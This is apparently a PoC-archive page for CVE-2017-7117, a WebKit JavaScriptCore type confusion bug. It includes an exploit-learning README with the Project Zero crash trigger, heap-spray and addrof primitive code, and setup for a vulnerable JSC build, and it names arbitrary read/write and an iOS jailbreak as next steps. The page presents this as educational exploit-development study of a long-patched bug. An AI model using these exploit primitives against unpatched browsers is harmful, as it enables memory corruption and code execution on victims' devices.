Related vulnerability
Title:
WebKit security vulnerability in multiple Apple products
(CVE-2017-7117)
Description: Apple iOS and related products are developed by the US company Apple. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that ships as the default browser on Mac OS X and iOS. WebKit is an open-source web browser engine developed jointly by KDE, Apple, Google and others, and is currently used by browsers such as Apple Safari and Google Chrome. The WebKit component in multiple Apple products contains a security vulnerability. A remote attacker can exploit it via maliciously crafted web content to execute arbitrary code (memory corruption). The following products and versions
Introduction
# cve-2017-7117
## About the Bug
A type confusion and use-after-free (UAF) found in iOS 10.3.4 and earlier, and in Safari before 11.0.
CVE-2017-7117: [mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7117)
## Original Proof of Concept
Discovered by @lokihardt, source: [Google Project Zero](https://project-zero.issues.chromium.org/issues/42450350)
```js
function f() {
  let o = {};
  for (let i in {xx: 0}) {   // i is a String
    for (i of [0]) {         // i is now a number, but the JIT still treats it as a String
    }
    print(o[i]);             // whoops
  }
}
f();
```
Running the code above will cause JSC to crash.
## The Exploit
We craft a large array `arr` that the JIT compiler will be confused into believing is a string.
```js
var arr = new Uint32Array(1 * 1024 * 1024 / 4); // 1 MB; each element is 4 bytes
arr[4] = 0xb0;                                  // to pass checks on the member m_hashAndFlags
```
When the reference to `i` is lost, we still hold the original array `arr` and can read the underlying memory through it.
By spraying a known marker value we can find that spot and then walk forward from it to locate the pointer to any object.
```js
function addrof(obj) {
  // marker value to search for in the freed array
  var locator = 0x1337;
  // spray the freed memory with the locator, alternating with the target object
  var sprays = [];
  for (var i = 0; i < 0x1000; ++i) {
    sprays.push(i % 2 == 0 ? locator : obj);
  }
  // find the first instance of the locator
  var found = null;
  for (var i = 0; i < arr.length; i++) {
    if (arr[i] == locator) {
      found = i;
      break;
    }
  }
  // the pointer for the object sits 3 and 2 indices after the locator
  // (explicit null check so an index of 0 is not mistaken for "not found")
  return found === null ? null : [arr[found + 3], arr[found + 2]];
}
```
Values are read through a `Uint32Array`, so a 64-bit pointer appears as two 32-bit halves: the lower 32 bits at the lower index and the upper 32 bits at the next index.
```js
let target = {
  foo: "bar"
};
let address = addrof(target);
// address: 0x0000ffff8d178e60
```
You can verify that the address is valid using the JSC shell's `describe()` builtin:
```js
print(describe(target))
// Object: 0xffff8d178e60 with butterfly (nil) (0xffff9099bba0:[Object, {foo:0}, NonArray, Proto:0xffff909b00a0, Leaf]), ID: 244
```
## Replicate the Setup
Currently tested on:
- Ubuntu 20.04.5 LTS ARM64
- Vulnerable JavaScriptCore (JSC) from libwebkitgtk version 2.16.0
- Build archive: [launchpad.net](https://launchpad.net/ubuntu/+source/webkit2gtk/2.16.0-1)
- LLDB for memory inspection (optional)
Does not work (yet) on iPhone 5, iOS 10.3.4. Let's find out why ...
## Next Steps?
- Craft a fake object
- Read / write arbitrary memory
- Jailbreak iOS 10?
## Important
This repository is provided as an educational resource to track my learning in exploit development. This CVE has been patched for more than 7 years. Do NOT use this for nefarious purposes, obviously.
File snapshot
[4.0K] /data/pocs/2d5cfb8e1e7420af40fa989b6618d4f0663645d2
├── [1.0K] LICENSE
├── [1.4K] poc.js
└── [2.7K] README.md
0 directories, 3 files
Notes
1. We recommend accessing the PoC through its original source first.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.